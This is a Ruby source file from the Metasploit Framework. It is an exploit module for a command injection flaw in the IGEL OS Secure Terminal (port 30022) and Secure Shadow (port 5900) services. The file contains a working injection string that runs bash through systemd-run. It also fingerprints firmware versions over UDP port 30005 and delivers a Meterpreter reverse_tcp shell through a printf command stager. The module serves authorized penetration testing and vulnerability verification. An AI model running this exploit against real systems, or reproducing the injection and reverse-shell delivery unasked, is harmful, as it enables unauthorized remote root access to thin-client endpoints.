Path: blob/master/modules/exploits/linux/misc/igel_command_injection.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  # Module metadata. The two targets differ only in their default RPORT
  # (30022/tcp Secure Terminal, 5900/tcp Secure Shadow); both are driven
  # through the same printf command stager. AutoCheck is prepended so the
  # version fingerprint in #check runs before any payload is sent.
  #
  # @param info [Hash] framework-supplied module info to merge
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'IGEL OS Secure VNC/Terminal Command Injection RCE',
        'Description' => %q{
          This module exploits a command injection vulnerability in IGEL OS Secure Terminal
          and Secure Shadow services.

          Both Secure Terminal (telnet_ssl_connector - 30022/tcp) and Secure
          Shadow (vnc_ssl_connector - 5900/tcp) services are vulnerable.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Rob Vinson', # Discovery
          'James Brytan', # Research and testing
          'James Smith', # Research and testing
          'Marisa Mack', # Research and testing
          'Sergey Pashevkin', # Research and testing
          'Steven Laura' # Research and testing
        ],
        'References' => [
          [ 'URL', 'https://kb.igel.com/securitysafety/en/isn-2021-01-igel-os-remote-command-execution-vulnerability-41449239.html' ],
          [ 'URL', 'https://www.igel.com/wp-content/uploads/2021/02/lxos_11.04.270.txt' ]
        ],
        'Platform' => ['linux'],
        'Arch' => [ARCH_X86, ARCH_X64],
        'Targets' => [
          [
            'Secure Terminal Service',
            {
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :cmd,
              'Platform' => 'linux',
              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', 'RPORT' => 30022 }
            }
          ],
          [
            'Secure Shadow Service',
            {
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :cmd,
              'Platform' => 'linux',
              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', 'RPORT' => 5900 }
            }
          ],
        ],
        'Privileged' => true,
        'DisclosureDate' => '2021-02-25',
        'CmdStagerFlavor' => ['printf'],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PrependFork' => true
        },
        'Notes' => {
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
          'Reliability' => [REPEATABLE_SESSION],
          'Stability' => [CRASH_SAFE]
        }
      )
    )

    register_advanced_options(
      [
        # Both services speak TLS, so SSL is forced on by default.
        OptBool.new('SSL', [ true, 'Negotiate SSL/TLS for outgoing connections', true]),
      ]
    )
  end

  # Fingerprints the host through the IGEL discovery service on udp/30005
  # and classifies the reported firmware version. The probe is a single
  # datagram with a short (0.5s) wait; anything that does not yield a
  # parsable `firmwareversion=<...>` field is reported as Unknown.
  #
  # Ranges encoded below, exactly as the original module treats them:
  # 10.0.0 <= v < 10.06.220 and 11.0.0 <= v < 11.04.270 are affected,
  # except 11.03.620 <= v < 11.04 which is treated as fixed.
  #
  # @return [Exploit::CheckCode] Appears, Safe or Unknown
  def check
    connect_udp(true, 'RPORT' => 30005)
    udp_sock.put('<igel_scan></igel_scan>')
    reply = udp_sock.recvfrom(65535, 0.5)
    disconnect_udp

    data = reply && reply[0]
    return Exploit::CheckCode::Unknown unless data

    match = data.match(/firmwareversion=<([0-9.]+)>/)
    return Exploit::CheckCode::Unknown unless match

    reported = match.captures[0]
    vprint_status("IGEL OS Version: #{reported}")
    version = Rex::Version.new(reported)

    # Half-open range test: low <= version < high.
    within = ->(low, high) { version >= Rex::Version.new(low) && version < Rex::Version.new(high) }

    return Exploit::CheckCode::Appears if within.call('10.0.0', '10.06.220')
    return Exploit::CheckCode::Safe if within.call('11.03.620', '11.04')
    return Exploit::CheckCode::Appears if within.call('11.0.0', '11.04.270')

    Exploit::CheckCode::Safe
  end

  # Sends one stager line over a fresh service connection. The socket is
  # always torn down in +ensure+, so a failed +put+ does not leave a
  # half-open session behind.
  #
  # @param cmd [String] command line produced by the command stager
  # @param _opts [Hash] unused; present to satisfy the CmdStager interface
  def execute_command(cmd, _opts = {})
    vprint_status("executing: #{cmd}")
    connect
    sock.put(%(PROXYCMD PW_;/usr/bin/systemd-run --scope bash -c "#{cmd}";false))
  ensure
    disconnect
  end

  # Drives the printf stager (150-byte lines, no concatenation, 2s delay
  # between lines). Transport-level failures are surfaced to the operator
  # as Failure::Unreachable instead of raw exceptions.
  def exploit
    execute_cmdstager(linemax: 150, noconcat: true, delay: 2)
  rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable,
         Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error,
         ::EOFError => e
    fail_with(Failure::Unreachable, "Failed executing payload with error #{e}.")
  end

end